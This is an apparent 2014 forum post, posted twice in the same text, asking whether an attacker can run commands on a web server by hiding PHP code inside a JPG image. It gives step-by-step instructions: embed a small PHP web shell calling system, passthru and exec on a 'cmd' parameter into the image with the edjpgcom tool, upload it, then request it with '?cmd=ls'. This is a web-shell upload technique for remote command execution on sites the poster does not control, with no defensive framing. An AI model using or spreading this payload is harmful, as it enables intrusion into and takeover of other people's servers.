is it impossible???
Posted: Thu Jun 19, 2014 7:49 am
hello
follow the steps:
1_download edjpgcom.exe program.
2_drag the jpg file in the edjpgcom program the u can put your cods into the jpg file
3_put these codes into it :
>
4_upload the jpg file.
5_run it like this image.jpg?cmd=ls
do u think is it possible to run command with this method??? or other extense of image files like png gif etc..
follow the steps:
1_download edjpgcom.exe program.
2_drag the jpg file in the edjpgcom program the u can put your cods into the jpg file
3_put these codes into it :
Code: Select all
<?PHP
system($cmd);
passthru($cmd);
exec($cmd);
?>
4_upload the jpg file.
5_run it like this image.jpg?cmd=ls
do u think is it possible to run command with this method??? or other extense of image files like png gif etc..